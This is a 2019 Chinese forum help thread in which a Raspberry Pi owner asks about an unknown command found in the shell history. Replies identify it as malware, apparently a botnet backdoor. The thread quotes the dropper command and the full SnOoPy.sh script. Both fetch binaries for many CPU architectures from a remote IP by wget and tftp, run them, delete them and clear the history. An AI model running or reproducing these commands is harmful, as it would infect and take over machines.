爱丽丝小黄鸡 发表于 2019-12-15 21:57

【求助】树莓派不知道执行了什么脚本

打开终端后,习惯性按了一下。发现没有看到过的一条命令。
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/SnOoPy.sh; chmod 777 *; sh SnOoPy.sh; tftp -g 104.248.95.152 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
求大神说一下这个是什么。{:301_999:}

涛之雨 发表于 2019-12-15 22:19

这貌似是基本指令???
emmm可以试一下那个格盘的指令{:301_1004:}

RuMeng 发表于 2019-12-15 22:19

十有八九是病毒啥的

MaxMadcc 发表于 2019-12-15 22:35

SnOoPy.sh会去下载一些elf然后执行,应该是个后门

cxw0102 发表于 2019-12-15 22:37

sh的代码:
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/m-i.p-s.SNOOPY; chmod +x m-i.p-s.SNOOPY; ./m-i.p-s.SNOOPY; rm -rf m-i.p-s.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/m-p.s-l.SNOOPY; chmod +x m-p.s-l.SNOOPY; ./m-p.s-l.SNOOPY; rm -rf m-p.s-l.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/s-h.4-.SNOOPY; chmod +x s-h.4-.SNOOPY; ./s-h.4-.SNOOPY; rm -rf s-h.4-.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/x-8.6-.SNOOPY; chmod +x x-8.6-.SNOOPY; ./x-8.6-.SNOOPY; rm -rf x-8.6-.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/a-r.m-6.SNOOPY; chmod +x a-r.m-6.SNOOPY; ./a-r.m-6.SNOOPY; rm -rf a-r.m-6.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/x-3.2-.SNOOPY; chmod +x x-3.2-.SNOOPY; ./x-3.2-.SNOOPY; rm -rf x-3.2-.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/a-r.m-7.SNOOPY; chmod +x a-r.m-7.SNOOPY; ./a-r.m-7.SNOOPY; rm -rf a-r.m-7.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/p-p.c-.SNOOPY; chmod +x p-p.c-.SNOOPY; ./p-p.c-.SNOOPY; rm -rf p-p.c-.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/i-5.8-6.SNOOPY; chmod +x i-5.8-6.SNOOPY; ./i-5.8-6.SNOOPY; rm -rf i-5.8-6.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/m-6.8-k.SNOOPY; chmod +x m-6.8-k.SNOOPY; ./m-6.8-k.SNOOPY; rm -rf m-6.8-k.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/p-p.c-.SNOOPY; chmod +x p-p.c-.SNOOPY; ./p-p.c-.SNOOPY; rm -rf p-p.c-.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/a-r.m-4.SNOOPY; chmod +x a-r.m-4.SNOOPY; ./a-r.m-4.SNOOPY; rm -rf a-r.m-4.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/a-r.m-5.SNOOPY; chmod +x a-r.m-5.SNOOPY; ./a-r.m-5.SNOOPY; rm -rf a-r.m-5.SNOOPY

wangyujie96 发表于 2019-12-15 22:45

2333,那个sh文件下载下来就被火绒sha掉了,100%肯定楼主中毒了

mzussle 发表于 2019-12-15 22:55

刚复制粘贴就报毒:rggrg   有点意思

yushangwl 发表于 2019-12-15 23:28

这个文件emmm

洛枫 发表于 2019-12-15 23:46

页: [1]
查看完整版本: 【求助】树莓派不知道执行了什么脚本